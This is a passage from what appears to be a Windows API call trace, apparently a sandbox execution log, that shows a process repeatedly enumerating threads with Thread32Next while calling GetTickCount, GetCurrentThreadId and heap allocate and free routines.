lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.660] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.660] GetTickCount () returned 0x116f57b [0129.660] GetCurrentThreadId () returned 0x618 [0129.660] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.660] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.660] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.661] GetTickCount () returned 0x116f57b [0129.661] GetCurrentThreadId () returned 0x618 [0129.661] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.661] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.661] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.662] GetTickCount () returned 0x116f57b [0129.662] GetCurrentThreadId () returned 0x618 [0129.662] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.662] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.662] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.663] GetTickCount () returned 0x116f57b [0129.663] GetCurrentThreadId () returned 0x618 [0129.663] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.663] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.663] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.664] GetTickCount () returned 0x116f57b [0129.664] GetCurrentThreadId () returned 0x618 [0129.664] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.664] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.664] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.664] GetTickCount () returned 0x116f57b [0129.664] GetCurrentThreadId () returned 0x618 [0129.664] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.664] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.665] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.665] GetTickCount () returned 0x116f57b [0129.665] GetCurrentThreadId () returned 0x618 [0129.665] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.665] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.665] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.666] GetTickCount () returned 0x116f57b [0129.666] GetCurrentThreadId () returned 0x618 [0129.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.666] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.666] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.667] GetTickCount () returned 0x116f57b [0129.667] GetCurrentThreadId () returned 0x618 [0129.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.667] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.667] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.668] GetTickCount () returned 0x116f57b [0129.668] GetCurrentThreadId () returned 0x618 [0129.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.668] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.668] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.669] GetTickCount () returned 0x116f57b [0129.669] GetCurrentThreadId () returned 0x618 [0129.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.669] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.669] GetTickCount () returned 0x116f57b [0129.669] GetCurrentThreadId () returned 0x618 [0129.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.669] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.670] GetTickCount () returned 0x116f57b [0129.670] GetCurrentThreadId () returned 0x618 [0129.670] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.670] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.671] GetTickCount () returned 0x116f57b [0129.671] GetCurrentThreadId () returned 0x618 [0129.671] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.671] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.672] GetTickCount () returned 0x116f57b [0129.672] GetCurrentThreadId () returned 0x618 [0129.672] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.672] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.672] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.673] GetTickCount () returned 0x116f58a [0129.673] GetCurrentThreadId () returned 0x618 [0129.673] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.673] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.673] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.674] GetTickCount () returned 0x116f58a [0129.674] GetCurrentThreadId () returned 0x618 [0129.674] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.674] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.674] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.675] GetTickCount () returned 0x116f58a [0129.675] GetCurrentThreadId () returned 0x618 [0129.675] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.675] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.675] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.676] GetTickCount () returned 0x116f58a [0129.676] GetCurrentThreadId () returned 0x618 [0129.676] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.676] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.676] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.676] GetTickCount () returned 0x116f58a [0129.676] GetCurrentThreadId () returned 0x618 [0129.676] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.677] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.677] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.677] GetTickCount () returned 0x116f58a [0129.677] GetCurrentThreadId () returned 0x618 [0129.677] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.677] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.677] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.678] GetTickCount () returned 0x116f58a [0129.678] GetCurrentThreadId () returned 0x618 [0129.678] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.678] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.678] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.679] GetTickCount () returned 0x116f58a [0129.679] GetCurrentThreadId () returned 0x618 [0129.679] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.679] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.679] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.680] GetTickCount () returned 0x116f58a [0129.680] GetCurrentThreadId () returned 0x618 [0129.680] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.680] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.680] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.680] GetTickCount () returned 0x116f58a [0129.680] GetCurrentThreadId () returned 0x618 [0129.680] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.680] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.680] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.681] GetTickCount () returned 0x116f58a [0129.681] GetCurrentThreadId () returned 0x618 [0129.681] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.681] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.681] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.682] GetTickCount () returned 0x116f58a [0129.682] GetCurrentThreadId () returned 0x618 [0129.682] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.682] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.682] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.683] GetTickCount () returned 0x116f58a [0129.683] GetCurrentThreadId () returned 0x618 [0129.683] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.683] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.683] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.684] GetTickCount () returned 0x116f58a [0129.684] GetCurrentThreadId () returned 0x618 [0129.684] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.684] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.684] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.684] GetTickCount () returned 0x116f58a [0129.684] GetCurrentThreadId () returned 0x618 [0129.684] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.684] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.684] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.685] GetTickCount () returned 0x116f58a [0129.685] GetCurrentThreadId () returned 0x618 [0129.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.685] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.685] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.686] GetTickCount () returned 0x116f58a [0129.686] GetCurrentThreadId () returned 0x618 [0129.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.686] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.687] GetTickCount () returned 0x116f58a [0129.687] GetCurrentThreadId () returned 0x618 [0129.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.687] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.687] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.687] GetTickCount () returned 0x116f58a [0129.687] GetCurrentThreadId () returned 0x618 [0129.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.687] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.687] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.688] GetTickCount () returned 0x116f59a [0129.688] GetCurrentThreadId () returned 0x618 [0129.689] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.689] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.689] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.689] GetTickCount () returned 0x116f59a [0129.689] GetCurrentThreadId () returned 0x618 [0129.689] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.689] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.689] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.690] GetTickCount () returned 0x116f59a [0129.690] GetCurrentThreadId () returned 0x618 [0129.690] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.690] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.690] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.691] GetTickCount () returned 0x116f59a [0129.691] GetCurrentThreadId () returned 0x618 [0129.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.691] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.692] GetTickCount () returned 0x116f59a [0129.692] GetCurrentThreadId () returned 0x618 [0129.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.692] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.692] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.692] GetTickCount () returned 0x116f59a [0129.692] GetCurrentThreadId () returned 0x618 [0129.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.692] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.692] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.693] GetTickCount () returned 0x116f59a [0129.693] GetCurrentThreadId () returned 0x618 [0129.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.693] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.694] GetTickCount () returned 0x116f59a [0129.694] GetCurrentThreadId () returned 0x618 [0129.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.694] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.695] GetTickCount () returned 0x116f59a [0129.695] GetCurrentThreadId () returned 0x618 [0129.695] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.695] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.695] GetTickCount () returned 0x116f59a [0129.695] GetCurrentThreadId () returned 0x618 [0129.696] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.696] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.696] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.696] GetTickCount () returned 0x116f59a [0129.696] GetCurrentThreadId () returned 0x618 [0129.696] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.696] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.696] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.697] GetTickCount () returned 0x116f59a [0129.697] GetCurrentThreadId () returned 0x618 [0129.697] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.697] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.697] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.698] GetTickCount () returned 0x116f59a [0129.698] GetCurrentThreadId () returned 0x618 [0129.698] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.698] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.698] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.699] GetTickCount () returned 0x116f59a [0129.699] GetCurrentThreadId () returned 0x618 [0129.699] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.699] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.699] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.699] GetTickCount () returned 0x116f59a [0129.699] GetCurrentThreadId () returned 0x618 [0129.699] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.699] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.699] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.700] GetTickCount () returned 0x116f59a [0129.700] GetCurrentThreadId () returned 0x618 [0129.700] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.700] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.700] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.701] GetTickCount () returned 0x116f59a [0129.701] GetCurrentThreadId () returned 0x618 [0129.701] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.701] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.701] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.702] GetTickCount () returned 0x116f59a [0129.702] GetCurrentThreadId () returned 0x618 [0129.702] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.702] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.702] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.703] GetTickCount () returned 0x116f59a [0129.703] GetCurrentThreadId () returned 0x618 [0129.703] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.703] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.703] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.703] GetTickCount () returned 0x116f59a [0129.703] GetCurrentThreadId () returned 0x618 [0129.703] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.703] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.703] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.704] GetTickCount () returned 0x116f5a9 [0129.704] GetCurrentThreadId () returned 0x618 [0129.704] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.704] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.704] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.705] GetTickCount () returned 0x116f5a9 [0129.705] GetCurrentThreadId () returned 0x618 [0129.705] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.705] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.705] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.706] GetTickCount () returned 0x116f5a9 [0129.706] GetCurrentThreadId () returned 0x618 [0129.706] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.706] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.706] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.706] GetTickCount () returned 0x116f5a9 [0129.706] GetCurrentThreadId () returned 0x618 [0129.707] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.707] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.707] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.707] GetTickCount () returned 0x116f5a9 [0129.707] GetCurrentThreadId () returned 0x618 [0129.707] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.707] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.707] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.708] GetTickCount () returned 0x116f5a9 [0129.708] GetCurrentThreadId () returned 0x618 [0129.708] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.708] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.708] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.709] GetTickCount () returned 0x116f5a9 [0129.709] GetCurrentThreadId () returned 0x618 [0129.709] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.709] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.709] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.710] GetTickCount () returned 0x116f5a9 [0129.710] GetCurrentThreadId () returned 0x618 [0129.710] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.710] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.710] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.711] GetTickCount () returned 0x116f5a9 [0129.711] GetCurrentThreadId () returned 0x618 [0129.711] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.711] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.711] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.712] GetTickCount () returned 0x116f5a9 [0129.712] GetCurrentThreadId () returned 0x618 [0129.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.712] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.712] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.713] GetTickCount () returned 0x116f5a9 [0129.713] GetCurrentThreadId () returned 0x618 [0129.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.713] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.713] GetTickCount () returned 0x116f5a9 [0129.713] GetCurrentThreadId () returned 0x618 [0129.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.713] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.714] GetTickCount () returned 0x116f5a9 [0129.714] GetCurrentThreadId () returned 0x618 [0129.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.714] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.714] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.715] GetTickCount () returned 0x116f5a9 [0129.715] GetCurrentThreadId () returned 0x618 [0129.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.715] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.716] GetTickCount () returned 0x116f5a9 [0129.716] GetCurrentThreadId () returned 0x618 [0129.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.716] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.716] GetTickCount () returned 0x116f5a9 [0129.716] GetCurrentThreadId () returned 0x618 [0129.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.717] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.717] GetTickCount () returned 0x116f5a9 [0129.717] GetCurrentThreadId () returned 0x618 [0129.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.717] HeapFree (in: 